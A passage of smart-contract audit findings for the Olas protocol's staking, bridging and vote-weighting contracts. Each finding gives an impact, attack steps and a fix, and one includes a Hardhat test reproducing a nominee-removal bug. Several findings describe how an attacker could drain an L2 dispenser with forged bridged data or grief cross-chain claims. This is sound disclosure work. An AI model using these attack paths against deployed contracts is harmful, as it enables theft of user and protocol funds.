        (uint256 cost, ) = IBridge(l2MessageRelayer).quoteEVMDeliveryPrice(uint16(l1SourceChainId), 0, gasLimitMessage);

        // Check that provided msg.value is enough to cover the cost
        if (cost > msg.value) {
            revert LowerThan(msg.value, cost);
        }

        // Send the message to L1
        uint64 sequence = IBridge(l2MessageRelayer).sendPayloadToEvm{value: cost}(uint16(l1SourceChainId),
            l1DepositProcessor, abi.encode(amount), 0, gasLimitMessage, uint16(l1SourceChainId), refundAccount);

        emit MessagePosted(sequence, msg.sender, l1DepositProcessor, amount);
    }

A cost is returned from quoteEVMDeliveryPrice that reflects the gas cost of executing the cross-chain transaction for the given gas limit of gasLimitMessage.

When this sendPayloadToEvm is called, cost amount will be sent for the cross-chain transaction, but the msg.value - cost will remain stuck and not refunded to the user.

Affects multiple areas of the codebase, see links to affected code.

Impact

msg.value - cost will remain stuck and not refunded to the user.

Tools Used

Manual

Recommended Mitigation Steps

Refund msg.value - cost to tx.origin

Assessed type

Other

The `refundAccount` is erroneously set to `msg.sender` instead of `tx.origin` when `refundAccount` specified as `address(0)`

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L59-L98
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/ArbitrumDepositProcessorL1.sol#L134-L137

Vulnerability details

For multiple bridge functions, it allows a user to specify a refundAccount parameter to receive the excess fees paid for cross-chain transaction.

Example shown:

WormholeDepositProcessorL1.sol#L59-L98

    function _sendMessage(
        address[] memory targets,
        uint256[] memory stakingIncentives,
        bytes memory bridgePayload,
        uint256 transferAmount
    ) internal override returns (uint256 sequence) {
        ...
        // If refundAccount is zero, default to msg.sender
        if (refundAccount == address(0)) {
            refundAccount = msg.sender;
        }
        ...
    }

When the refundAccount is address(0) we default to the msg.sender. The intended functionality of this, as quoted by sponsor:

For example, when the user does not care about the funds, or they don't want to go into the payload data complications
The intention is - we don't want to steal user's funds, and if they don't care - we refer them to the user

However for the L1DepositProcessor contracts, msg.sender will always be the
Dispenser contract, so the refunds will be sent to the wrong address.

This also affects the Arbitrum contracts.

Impact

The intended functionality is broken and refunds will be sent to the wrong address.

Tools Used

Manual

Recommended Mitigation Steps

Set the refundAccount to tx.origin instead.

Assessed type

Other

Users will lose all ETH sent as `cost` parameter in transactions to and from Optimism

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismDepositProcessorL1.sol#L140
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismDepositProcessorL1.sol#L121

Vulnerability details

The OptimismDepositProcessorL1 contract is designed to send tokens and data from L1 to L2 using the Optimism bridge. It interacts with the L1CrossDomainMessenger to deposit ERC20 tokens and send messages.

The _sendMessage() function extracts the cost and gasLimitMessage variables from the bridgePayload function parameter, which is user-provided and passed on from the Dispenser contract.

The cost variable is meant to represent the costs the user must pay to the bridge for sending and delivering the message and is verified to be within 0 < cost <= msg.value before being passed on as value to L1CrossDomainMessenger.sendMessage(). However, this is not how Optimism charges for fees, and the ETH sent with this transaction is unnecessary and will lead to loss for the caller.

According to the Optimism documentation, the cost of message delivery is covered by burning gas on L1, not by transferring ETH to the bridging functions. As can be seen in the sendMessage() implementation, this value is encoded as parameter to relayMessage() on the receiving side:

File: CrossDomainMessenger.sol
176:     function sendMessage(address _target, bytes calldata _message, uint32 _minGasLimit) external payable {
177:         if (isCustomGasToken()) {
178:             require(msg.value == 0, "CrossDomainMessenger: cannot send value with custom gas token");
179:         }
180: 
181:         // Triggers a message to the other messenger. Note that the amount of gas provided to the
182:         // message is the amount of gas requested by the user PLUS the base gas value. We want to
183:         // guarantee the property that the call to the target contract will always have at least
184:         // the minimum gas limit specified by the user.
185:         _sendMessage({
186:             _to: address(otherMessenger),
187:             _gasLimit: baseGas(_message, _minGasLimit),
188:             _value: msg.value,
189:             _data: abi.encodeWithSelector(
190:                 this.relayMessage.selector, messageNonce(), msg.sender, _target, msg.value, _minGasLimit, _message
191:             )
192:         });

And it is then passed in full as msg.value along with the message:

File: CrossDomainMessenger.sol
211:     function relayMessage(
212:         uint256 _nonce,
213:         address _sender,
214:         address _target,
215:         uint256 _value,
216:         uint256 _minGasLimit,
217:         bytes calldata _message
218:     )
219:         external
220:         payable
221:     {

			 ...

287:         bool success = SafeCall.call(_target, gasleft() - RELAY_RESERVED_GAS, _value, _message);

Therefore, passing cost as msg.value results in the entire amount being sent to the receiveMessage() function on L2, where it remains unused in the OptimismTargetDispenserL2 contract. This behavior forces users to pay ETH that serves no purpose.

The OptimismTargetDispenserL2 implements the same behaviour in _sendMessage(). However, this function is only reachable from syncWithheldTokens(), which will likely not usually be called by users.

Impact

  • Users are forced to pay ETH (which would likely be calculated as some multiple of gasLimitMessage) that is not utilized for its intended purpose, resulting in a direct loss.
  • The OptimismTargetDispenserL2 contract accumulates unnecessary ETH.

Proof of Concept

  1. A user initiates a token transfer from L1 to Optimism through the Dispenser contract, which calls the OptimismDepositProcessorL1 contract.
  2. The _sendMessage() function is called with a cost parameter.
  3. The cost is passed as msg.value to the sendMessage() function of Optimism's L1CrossDomainMessenger contract.
  4. The sendMessage() function sends the msg.value to the receiveMessage() function on L2.
  5. The ETH remains in the OptimismTargetDispenserL2 contract, unused, resulting in a loss for the user.

Tools Used

Manual review

Recommended Mitigation Steps

Modify the _sendMessage() function to only decode a gasLimitMessage variable from the bridgePayload parameter, and do not pass any ETH to L1CrossDomainMessenger.sendMessage(). The user should be responsible for submitting the transaction with a high enough gas limit to send the message.

Assessed type

ETH-Transfer

Retain function does not check for paused state

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1129
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1157

Vulnerability details

The retain() function in the Dispenser contract is designed to return staking incentives back to the staking inflation. This function can be called by anyone and calculates the total return amount by iterating over the epochs and using the staking weight for each epoch. It then calls Tokenomics.refundFromStaking() to return the calculated amount to the staking inflation.

The issue is that the function does not check the paused state before performing these operations. If the contract is in a paused state, it indicates that the system might be in an inconsistent state, and performing operations like claiming or retaining incentives could lead to incorrect calculations and unintended consequences.

An example of such a state provided by the sponsor:

staking fractions are changed at the end of the epoch, so we don't want any nominees being considered for staking incentives in the epoch when the fractions are initialized

Since the retain() function uses the StakingPoint.stakingIncentive variable, which depends on the staking fraction, allowing it to be called while the contract is paused has the same impact.

Impact

Incorrectly calculated amounts can be sent back to the staking inflation, leading to a misallocation of staking incentives and potentially undefined behaviour in the Tokenomics contract.

Proof of Concept

  1. The contract owner pauses the Dispenser contract to prevent claiming incentives during an inconsistent state.
  2. An attacker or user calls the retain() function.
  3. The function executes without checking the paused state, leading to incorrect calculations.
  4. Incorrect amounts are sent back to the staking inflation.

Tools Used

Manual review

Recommended Mitigation Steps

Add a check for the paused state at the beginning of the retain() function to ensure that it does not execute when the contract is paused. The check should be similar to the ones used in other functions like claimOwnerIncentives() and claimStakingIncentives().

Assessed type

Other

inflation recalculation return incorrect inflationPerEpoch

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L1122-L1143

Vulnerability details

Vulnerability Detail

During the checkpoint, if the year changes during the epoch, function does handle the inflationPerEpoch incorrectly.

Proof of Concept

The critical flow begins with checking the current year

uint256 numYears = (block.timestamp - timeLaunch) / ONE_YEAR;

It worth to mention that numYears is updated only when it equals to whole number. If timeLaunch was 3 years ago, we need full year to be based, so numYears updates to 4. Because 3.1-3.9 year would be rounded. It is important edge, because below, during the yearEndTime calculation, it will return the current timestamp

It calculates the yearEndTime by taking the timeLaunch + numYears(current one we switched to) * ONE_YEAR, and it returns the current block.timestamp

uint256 yearEndTime = timeLaunch + numYears * ONE_YEAR

Then, It returns current inflation that start from prevEpochTime till yearEndTime (current timestamp) and multiply by curInflation

inflationPerEpoch = (yearEndTime - prevEpochTime) * curInflationPerSecond

After, the new curInflationPerSecond is taken for the new year

curInflationPerSecond = getInflationForYear(numYears) / ONE_YEAR;

Eventually, the inflationPerEpoch is recalculated via

inflationPerEpoch += (block.timestamp - yearEndTime) * curInflationPerSecond;

Here is the problem, because yearEndTime is equal to the block.timestamp
and first part (deduction) would return 0 and the final result would be 0. It means that inflationPerEpoch would fail to add new time-frame with new curInflationPerSecond.

It means that incorrect inflationPerEpoch (past one) would be added into this part of the code below

//Bonding and top-ups in OLAS are recalculated based on the inflation schedule per epoch
tp.epochPoint.totalTopUpsOLAS = uint96(inflationPerEpoch);
incentives[4] = (inflationPerEpoch * tp.epochPoint.maxBondFraction) / 100;

If we proceed below we could note that topUps would be calculated with incorrect inflationPerEpoch.

incentives[5] = (inflationPerEpoch * tp.unitPoints[0].topUpUnitFraction) / 100; //e: component ownerTopUps calculus
// Owner top-ups: epoch incentives for agent owners funded with the inflation
incentives[6] = (inflationPerEpoch * tp.unitPoints[1].topUpUnitFraction) / 100;

Impact

Incorrect inflationPerEpoch would used during the recalculation.

Recommendation

Adjust the calculation, ensure that correct inflation is returned from the calculation

Assessed type

Math

Arbitrary tokens and data can be bridged to `GnosisTargetDispenserL2` to manipulate staking incentives

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/GnosisTargetDispenserL2.sol#L99-L107

Vulnerability details

The GnosisTargetDispenserL2 contract receives OLAS tokens and data from L1 to L2 via the Omnibridge, or just data via the AMB. When tokens are bridged, the onTokenBridged() callback is invoked on the contract. This callback processes the received tokens and associated data by calling the internal _receiveMessage() function.

However, the onTokenBridged() callback does not verify the sender of the message on the L1 side (or the token received).

This allows anyone to send any token to the GnosisTargetDispenserL2 contract on L2 along with arbitrary data. The _receiveMessage() function in DefaultTargetDispenserL2 will then process this data, assuming it represents valid staking targets and incentives.

Impact

An attacker can bridge any tokens to the GnosisTargetDispenserL2 contract on L2 with fake data for staking incentives. If the contract holds any withheld funds, these funds can be redistributed to arbitrary targets as long as they pass the checks in _processData().

Even if the contract doesn't hold any withheld funds, the attacker can cause the amounts to be stored in stakingQueueingNonces and redeem them at a later point.

Proof of Concept

  1. Attacker calls relayTokensAndCall() on the Omnibridge on L1 to send any tokens to the GnosisTargetDispenserL2 contract on L2
  2. Attacker includes malicious staking data in the payload parameter
  3. onTokenBridged() is called on GnosisTargetDispenserL2, which invokes _receiveMessage() to process the data
  4. Since the L1 sender is not validated, the malicious data is accepted and fake staking incentives are distributed

Tools Used

Manual review

Recommended Mitigation Steps

The Omnibridge contracts do not seem to provide a way to access the original sender's address on L1 when executing the receiver callback upon receiving tokens. Hence the most sensible mitigation may be to send the bridged tokens and associated staking data separately:

  1. When bridging tokens, only send the token amount without any data via relayTokens()
  2. Always transmit the staking data through the AMB via requireToPassMessage()
  3. Remove the onTokenBridged() callback from GnosisTargetDispenserL2

This way, an attacker cannot send fake data along with the bridged tokens. The staking data will be validated to come from the authentic source on L1.

Assessed type

Access Control

Incorrect staking incentives can be sent to `GnosisTargetDispenserL2` and cause OLAS tokens to be allocated to incorrect staking targets

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/GnosisTargetDispenserL2.sol#L99-L107

Vulnerability details

GnosisTargetDispenserL2.onTokenBridged does not take steps to verify that the L1 deposit processor really sent the message when receiving a cross-chain token transfer in the onTokenBridged function.

GnosisTargetDispenserL2.sol#L99-L107

    function onTokenBridged(address, uint256, bytes calldata data) external {
        // Check for the message to come from the L2 token relayer
        if (msg.sender != l2TokenRelayer) {
            revert TargetRelayerOnly(msg.sender, l2TokenRelayer);
        }

        // Process the data
        _receiveMessage(l2MessageRelayer, l1DepositProcessor, data);
    }

It calls _receiveMessage which will process the data. Here the first parameter is set to the default l1DepositProcessor which means that the contract does not verify which address on the L1 performed the cross-chain transmission.

So a message with incorrect stakingIncentives can be sent by performing the same call on the l1TokenRelayer from a malicious contract.

GnosisDepositProcessorL1.sol#L63-L71

        // Transfer OLAS together with message, or just a message
        if (transferAmount > 0) {
            // Approve tokens for the bridge contract
            IToken(olas).approve(l1TokenRelayer, transferAmount);

            bytes memory data = abi.encode(targets, stakingIncentives);
            IBridge(l1TokenRelayer).relayTokensAndCall(olas, l2TargetDispenser, transferAmount, data);

            sequence = stakingBatchNonce;
        } 

Impact

Incorrect staking incentives can be passed to the L2. This can cause the dispenser to allocate OLAS to the incorrect staking targets via redeem.

A malicious user for example, can call the relayTokensAndCall function with the incorrect staking target and staking incentive equal to the entire OLAS balance of the L2 Dispenser which will allow the redeem function on the L2 Dispenser to send its entire OLAS balance to the single staking target draining it of its funds.

Tools Used

Manual

Recommended Mitigation Steps

Perform the token transmission separately from the message transmission so that don't need to call _receiveMessage in onTokenBridged.

Assessed type

Other

Unauthorized claiming of staking incentives for retainer

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1162
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L953

Vulnerability details

The Dispenser contract is responsible for distributing staking incentives to various targets. One of the functionalities provided by the contract is the ability to claim staking incentives for a specific staking target using the claimStakingIncentives() function. This function calculates the staking incentives for a given target and distributes them accordingly.

The retain() function, on the other hand, is designed to retain staking incentives for the retainer address and return them back to the staking inflation.

However, there is no check to ensure users cannot call the claimStakingIncentives() function for the retainer address and send the staking incentives to the retainer instead of returning them to the staking inflation.

This means anyone can divert the retainer rewards, which are meant to be sent back to the staking inflation, to the retainer itself. In that scenario, there is no way to return the funds to the staking incentive.

Impact

Loss of staking incentives that should have been returned to the staking inflation.

Proof of Concept

  1. An attacker calls the claimStakingIncentives() function with the retainer address as the staking target.
  2. The function calculates the staking incentives for the retainer address.
  3. Instead of returning the incentives to the staking inflation, the incentives are sent to the retainer address.
  4. The attacker successfully redirects the staking incentives to the retainer, bypassing the intended logic of the retain() function.

Tools Used

Manual review

Recommended Mitigation Steps

Restrict the claimStakingIncentives() function to prevent the claiming of rewards for the retainer address.

Assessed type

Invalid Validation

Incorrect Handling of Last Nominee Removal in `removeNominee` Function

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L622-L624

Vulnerability details

Summary

A vulnerability was discovered in the removeNominee function of the VoteWeighting.sol contract. The issue arises when removing the last nominee from the list, resulting in an incorrect update of the mapNomineeIds mapping. This can lead to inconsistencies in nominee management, potentially causing data corruption and unexpected behavior in the contract.

Impact

The vulnerability impacts the integrity of the mapNomineeIds mapping. When the last nominee in the setNominees array is removed, its ID is incorrectly reassigned, leaving a stale entry in mapNomineeIds. This can lead to:

  • Inability to clear the ID of the removed nominee.
  • Potential data corruption if new nominees are added and removed subsequently.
  • Unexpected behavior when querying or managing nominees.

Proof of Concept

In the removeNominee function, the following code is responsible for updating the mapNomineeIds mapping and handling the removal of the nominee:

contracts/VoteWeighting.sol:
  618:         // Remove nominee from the map
  619:         mapNomineeIds[nomineeHash] = 0;
  620: 
  621:         // Shuffle the current last nominee id in the set to be placed to the removed one
  622:         nominee = setNominees[setNominees.length - 1];
  623:         bytes32 replacedNomineeHash = keccak256(abi.encode(nominee));
  624:         mapNomineeIds[replacedNomineeHash] = id;
  625:         setNominees[id] = nominee;
  626:         // Pop the last element from the set
  627:         setNominees.pop();

The above code aims to remove a nominee by zeroing out its ID in the mapNomineeIds mapping and then reassigning the ID of the last nominee in the setNominees array to fill the gap left by the removed nominee. However, this logic fails to handle the case where the nominee being removed is the last one in the setNominees array. In such cases:

  1. Line 619 correctly sets the nominee's ID to 0 in mapNomineeIds.
  2. Lines 621-623 fetch the last nominee in the setNominees array.
  3. Lines 624-625 incorrectly reassign the ID of the last nominee, which is the nominee being removed, back to the mapNomineeIds mapping.

This results in a stale ID entry in mapNomineeIds, leaving the system in an inconsistent state. The following code snippet checks for nominee existence, which demonstrates the impact of the stale ID:

contracts/VoteWeighting.sol:
  805:             // Check for nominee existence
  806:             if (mapNomineeIds[nomineeHash] == 0) {
  807:                 revert NomineeDoesNotExist(accounts[i], chainIds[i]);
  808:             }

If the stale ID remains in mapNomineeIds, this check will fail to correctly identify that the nominee no longer exists, potentially leading to unexpected behavior or errors in other contract functions.

Test Case (Hardhat)

The following PoC demonstrates the issue using Hardhat. Add it as part of governance/test test suit.

`governance/test/VoteWeightingPoC.js`
/*global describe, context, beforeEach, it*/

const { expect } = require("chai");
const { ethers } = require("hardhat");
const helpers = require("@nomicfoundation/hardhat-network-helpers");

describe("Vote Weighting PoC", function () {
    let olas;
    let ve;
    let vw;
    let signers;
    let deployer;
    const initialMint = "1000000000000000000000000"; // 1_000_000
    const chainId = 1;


    function convertAddressToBytes32(account) {
        return ("0x" + "0".repeat(24) + account.slice(2)).toLowerCase();
    }

    beforeEach(async function () {
        const OLAS = await ethers.getContractFactory("OLAS");
        olas = await OLAS.deploy();
        await olas.deployed();

        signers = await ethers.getSigners();
        deployer = signers[0];
        await olas.mint(deployer.address, initialMint);

        const VE = await ethers.getContractFactory("veOLAS");
        ve = await VE.deploy(olas.address, "Voting Escrow OLAS", "veOLAS");
        await ve.deployed();

        const VoteWeighting = await ethers.getContractFactory("VoteWeighting");
        vw = await VoteWeighting.deploy(ve.address);
        await vw.deployed();
    });

    context("Remove nominee", async function () {
        
        it("Removing last element in nominee list, will leave its id in the `mapNomineeIds`", async function () {
            // Take a snapshot of the current state of the blockchain
            const snapshot = await helpers.takeSnapshot();

            const numNominees = 2;
            // Add nominees and get their bytes32 addresses
            let nominees = [signers[1].address, signers[2].address];
            for (let i = 0; i < numNominees; i++) {
                await vw.addNomineeEVM(nominees[i], chainId);
                nominees[i] = convertAddressToBytes32(nominees[i]);
            }

            // Get the first nominee id
            let id = await vw.getNomineeId(nominees[1], chainId);
            // The id must be equal to 1
            expect(id).to.equal(2);

            // Remove the last nominee in the list
            await vw.removeNominee(nominees[1], chainId);

            // The id did not cleared
            id = await vw.getNomineeId(nominees[1], chainId);
            // The id must be equal to 1
            expect(id).to.equal(2);

            // Now, when user call `getNextAllowedVotingTimes` with removed nominee,
            // it should revert with `NomineeDoesNotExist` error, but the call success without reverts
            await vw.getNextAllowedVotingTimes(
                [nominees[0], nominees[1]],
                [chainId, chainId],
                [deployer.address, deployer.address]
            );

            // However, there is no way to clear it from the `mapNomineeIds`
            // If owner try to remove it again it will revert, since there is no nominee in its index
            await expect(
                vw.removeNominee(nominees[1], chainId)
            ).to.be.revertedWithPanic(0x32); //"Array accessed at an out-of-bounds or negative index"

            // But if the owner try to remove it after adding a new nominee in-place
            // It will remove another nominee account where it will make more data corruption
            nominees[2] = signers[3].address;
            await vw.addNomineeEVM(nominees[2], chainId);
            nominees[2] = convertAddressToBytes32(nominees[2]);

            let nominees1Id = await vw.getNomineeId(nominees[1], chainId);
            let nominees2Id = await vw.getNomineeId(nominees[2], chainId);
            expect(nominees1Id).to.equal(nominees2Id);

            // Remove the removed nominee will not revert now
            await vw.removeNominee(nominees[1], chainId);

            // The actual removed nominee (in setNominees) is the nominees[2]
            await expect(
                vw.getNominee(nominees2Id)
            ).to.be.revertedWithCustomError(vw, "Overflow");

            // Restore to the state of the snapshot
            await snapshot.restore();
        });
    });
});

Tools Used

  • Hardhat

Recommended Mitigation Steps

To mitigate this vulnerability, an additional check should be implemented to ensure that the nominee being removed is not the last one in the setNominees array. If it is, the reassignment of the nominee ID should be skipped. Here is a proposed fix in the form of a git diff:

     // Shuffle the current last nominee id in the set to be placed to the removed one
+    if (id != setNominees.length - 1) {
         nominee = setNominees[setNominees.length - 1];
         bytes32 replacedNomineeHash = keccak256(abi.encode(nominee));
         mapNomineeIds[replacedNomineeHash] = id;
         setNominees[id] = nominee;
+    }
     // Pop the last element from the set
     setNominees.pop();

This fix ensures that the ID reassignment is only performed if the removed nominee is not the last one in the array, thus preserving the integrity of the mapNomineeIds mapping.

Assessed type

Other

syncWithheldTokens on Arbitrum could fail to be delivered.

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L323-L345

Vulnerability details

Vulnerability Detail

The execution flow begins on the ArbitrumDispenserL2, in syncWithheldTokens function. Any user can call this function to syncs withheld token amount with L1. However, if the user forge the msg.value along with the call on L2, so it will be enough to proceed on L2, but not enough to be delivered on L1, the tx could fail.

Proof of Concept

The msg.value that user provide on L2, will be used to execute the call on L1. We can see it in the L2ToL1MessageNitro.ts in Arbitrum. Callvalue is msg.value

return await outbox.executeTransaction(
      proof,
      this.event.position,
      this.event.caller,
      this.event.destination,
      this.event.arbBlockNum,
      this.event.ethBlockNum,
      this.event.timestamp,
      this.event.callvalue,
      this.event.data,
      overrides || {}
    )
  }

Consequently , in the Outbox.sol the executeBridgeCall on L1 function will be triggered.

function executeBridgeCall(
        address to,
        uint256 value,
        bytes memory data
    ) internal {
        (bool success, bytes memory returndata) = bridge.executeCall(to, value, data);

In the bridge it will trigger this logic.

(success, returnData) = to.call{value: value}(data);

So we can see that everything is based on msg.value and if the tx is failed to be executed (due to out of gas error) it will not be possible to re-execute this function.

Impact

The tx could fail on L1, but the withheldAmount would be set to 0 (result of successful execution) on L2. Consequently, the DAO will be force to manually restore the data.

Recommendation

Ensure that enough msg.value is passed on L2. Or, ensure that only whitelisted user’s could call this function.

Assessed type

Other

No limit on maximum number of `stakingTargets` for `claimStakingIncentivesBatch`

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1058

Vulnerability details

There is no maximum limit for the number of stakingTargets for the permissionless claimStakingIncentivesBatch when sending the cross-chain transaction.

When the claimStakingIncentivesBatch data is received on the L2, the gas required grows linearly with the number of stakingTargets as seen in the for loop below

DefaultTargetDispenserL2.sol#L154-L213

    function _processData(bytes memory data) internal {
        ...
        // Traverse all the targets
        for (uint256 i = 0; i < targets.length; ++i) {
            ...
        }
        ...
    }

Impact

Therefore, a user can purposely cause the cross-chain message to fail by putting in so many staking targets such that it exceeds the block gas limit in the L2, causing the cross-chain message to fail, because of a lack of a maximum limit of staking targets check in claimStakingIncentivesBatch - https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1058

Tools Used

Manual Review

Recommended Mitigation Steps

Enforce a reasonable maximum limit for the number of staking targets that can be passed in claimStakingIncentivesBatch

Assessed type

Other

Attacker can make claimed staking incentives irredeemable on Gnosis Chain

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/GnosisDepositProcessorL1.sol#L77
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/GnosisDepositProcessorL1.sol#L90

Vulnerability details

The GnosisDepositProcessorL1 contract is responsible for bridging OLAS tokens and messages from L1 to the GnosisTargetDispenserL2 contract on Gnosis Chain. When calling claimStakingIncentives() or claimStakingIncentivesBatch() on the Dispenser contract for a nominee on Gnosis, it calls _sendMessage() internally to send the incentive amounts and any necessary funds to L2.

If the transferAmount has been reduced to 0 due to sufficient withheld funds on Gnosis, it only sends a message via the Arbitrary Message Bridge (AMB) to process the claimed incentives.

However, when sending this message, the caller provides a gasLimitMessage parameter to specify the gas limit for executing the message on L2. There is no lower bound enforced on this value, although it is required to be >= 100 internally by the AMB. If the caller sets gasLimitMessage too low, the message will fail to execute on L2 due to out of gas.

Because the Gnosis AMB provides no native way to replay failed messages, if a message fails due to insufficient gas, the claimed staking incentives will be irredeemable on L2. An attacker could intentionally grief the protocol by repeatedly claiming incentives with an insufficient gas limit, causing them to be lost.

While the protocol could call processDataMaintenance() on L2 with the data from the cancelled message to recover, this would require passing a governance proposal. Given that this attack can be carried out any number of times (e.g. as often as possible and with a different target each time), this can considerably impact the functioning of the protocol hence I believe Medium severity is justified.

Impact

An attacker can make legitimately claimed staking incentives irredeemable on L2 by setting an insufficient gas limit when claiming. This would require governance intervention each time to recover the lost incentives.

Proof of Concept

  1. Some amount of OLAS is withheld in the GnosisTargetDispenserL2 contract
  2. The amount is synced to the Dispenser on L1 via GnosisTargetDispenserL2.syncWithheldtokens()
  3. Attacker calls claimStakingIncentives() on the Dispenser contract for a nominee on Gnosis Chain that has accumulated less rewards than the withheld amount, providing an insufficient gasLimitMessage in the bridgePayload
  4. Message is sent via AMB but fails to execute on L2 due to out of gas
  5. Claimed staking incentives are now stuck and irredeemable on L2

Tools Used

Manual review

Recommended Mitigation Steps

Do not allow users to directly specify the gasLimitMessage. Instead, have the GnosisDepositProcessorL1 contract calculate the required gas based on the number of targets and stakingIncentives being processed. A small buffer can be added to account for any minor differences in gas costs.

Alternatively, implement a way to replay failed messages from the AMB, so that irredeemable incentives can be recovered without requiring governance intervention.

Assessed type

Other

Staked service will be irrecoverable by owner if not an ERC721 receiver

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L864

Vulnerability details

The StakingBase contract allows users to stake services represented by ERC721 tokens. These services are freely transferable, meaning they could be staked by contracts that do not implement the ERC721TokenReceiver interface.

When a user calls unstake() to withdraw their staked service, the contract attempts to transfer the ERC721 token back to the msg.sender (which must match the original depositor) using safeTransferFrom():

File: StakingBase.sol
862:         // Transfer the service back to the owner
863:         // Note that the reentrancy is not possible due to the ServiceInfo struct being deleted
864:         IService(serviceRegistry).safeTransferFrom(address(this), msg.sender, serviceId);

However, if the owner is a contract that does not support receiving ERC721 tokens, this transfer will fail. As a result, the service associated with serviceId will be permanently locked in the StakingBase contract, and the original owner will be unable to recover it.

Impact

Staked services will become permanently irrecoverable if the owner cannot receive ERC721 tokens.

Proof of Concept

  1. User stakes a service by calling stake(serviceId) on the StakingBase contract from a smart contract that is not an ERC721TokenReceiver, and cannot be upgraded to support this (e.g. a Safe with restricted privileges). The service is transferred from the user to the contract.
  2. When the user later tries to unstake and recover their service by calling unstake(serviceId), the safeTransferFrom() call in the function reverts.
  3. The service remains locked in the StakingBase contract indefinitely, and the user is unable to recover it.

Tools Used

Manual review

Recommended Mitigation Steps

Consider using transferFrom() instead of safeTransferFrom() when transferring the service back to the owner in unstake(). This will allow the transfer to succeed even if the recipient is not an ERC721 receiver.

Assessed type

ERC721

Service with pending rewards can't unstake even when its more profitable to forgo reward

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L867-L869
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L104-L111
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingNativeToken.sol#L28-L37

Vulnerability details

Relevant code: StakingBase::unstake, StakingToken::_withdraw, StakingNativeToken::_withdraw

Description

Upon calling the unstake function, it ensures that the unstaking service collects any pending rewards:

if (reward > 0) {
    _withdraw(multisig, reward);
}

The withdraw implementation is different, depending on wether the Staking contract distributes tokens or native currency as rewards, but it essentially boils down to subtracting rewards from the current balance and transferring them to the service multisig - balance -= amount;.

The mandatory collection of reward can cause the service to be staked for much longer than it's owner intended to. Consider a situation where the Staking contract has no funds to distribute and all calls to unstake revert due to an underflow in the _withdraw function: balance -= amount;.

Root Cause

Lack of force unstake mechanism that will forfeit rewards in favour of the service owner being able to stake elsewhere.

Impact

Having a Staking contract without funds to distribute can be especially damaging in cases where there are multiple services staked with pending rewards. In such situations owners will either have to wait for new rewards without any guarantees of new funds arriving or they would have to deposit themselves so they can unstake. The second option puts their funds at risk, as another service could use their deposit to unstake before them.

The lack of force unstake creates a peculiar situation where service owners could incur opportunity loss or have to potentially pay to unstake (with the risk of losing funds).

PoC

Lets suppose the following turn of events:

  • Staking contract stops receiving regular funding
  • Services have rewards pending that are more than the current balance in the contract.
  • Service owners can't unstake and move to a more profitable Staking contract.
  • If a service owner deposits in the Staking contract themselves, they could get frontrun by another owner and lose their funds.

Suggested Mitigation

Add a forceUnstake flag that will allow unstake without receiving the pending rewards. It could look something like this:

if (forceUnstake) {
	sInfo.reward = 0;
	reward = 0;
} else if (reward > 0) {
	_withdraw(multisig, reward);
}

Assessed type

DoS

`pointsSum.slope` Not Updated After Nominee Removal and Votes Revocation

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/governance/contracts/VoteWeighting.sol#L586-L637
https://github.com/code-423n4/2024-05-olas/blob/main/governance/contracts/VoteWeighting.sol#L223-L249

Vulnerability details

Issue Description

The removeNominee and revokeRemovedNomineeVotingPower functions are part of the governance mechanism in the VoteWeighting.sol smart contract.

  • The removeNominee function removes a nominee from the voting system.
  • The revokeRemovedNomineeVotingPower function revokes the voting power that a user has delegated to a nominee who has been removed.

When a user votes for a nominee using the voteForNomineeWeights function, both pointsSum.slope and pointsSum.bias are updated to reflect the new voting weights:

pointsWeight[nomineeHash][nextTime].bias = _maxAndSub(_getWeight(account, chainId) + newBias, oldBias);
pointsSum[nextTime].bias = _maxAndSub(_getSum() + newBias, oldBias);
if (oldSlope.end > nextTime) {
    pointsWeight[nomineeHash][nextTime].slope =
        _maxAndSub(pointsWeight[nomineeHash][nextTime].slope + newSlope.slope, oldSlope.slope);
    pointsSum[nextTime].slope = _maxAndSub(pointsSum[nextTime].slope + newSlope.slope, oldSlope.slope);
} else {
    pointsWeight[nomineeHash][nextTime].slope += newSlope.slope;
    pointsSum[nextTime].slope += newSlope.slope;
}

